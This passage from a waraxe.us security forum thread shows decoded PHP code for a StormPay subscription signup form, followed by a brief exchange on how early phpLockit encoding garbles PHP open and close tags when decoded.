$stormpay?>">  <input type="hidden" name=product_name value="<? echo  $pname?> Member">  <input type="hidden" name=subscription value="YES"><input type="hidden" name=setup_fee value="0.00">  <input type="hidden" name=recurrent_charge value="<? echo  $cost?>"><input type="hidden" name=duration value="30">  <input type="hidden" name=return_URL value="<? echo  $url?>/signup.php?step=two&r=<? echo  $r?>">  <input type="hidden" name=cancel_URL value="<? echo  $url ?>/?r=<? echo  $r?>">  <input type="submit" name="submit" value="Step One">  </form><br><br>  <?  }  }  require('bottom.php');  exit();  ?> ZeroBytes Posted: Wed Jan 28, 2009 11:21 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu And difference is ... ? Posted: Thu Jan 29, 2009 1:02 am zerobytes Valuable expert   Joined: Aug 30, 2008 Posts: 199 This is an early version of phplockit and there one thing that is always overlooked, this version of phplockit does strange things with the php tags example from your code. require('top.php'); ;echo '<center><br><br> '; if ($submit) { decoded correctlty should be require('top.php'); ?> <center><br><br> <? if ($submit) { if (!$id || !$first if look through the code you will see them all over the place and php wont know where php starts and ends to make way for the html.. Sorry I was`nt disrespecting you ZeroBytes Help with Decode   www.waraxe.us Forum Index -> PHP script decode requests You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.169 Seconds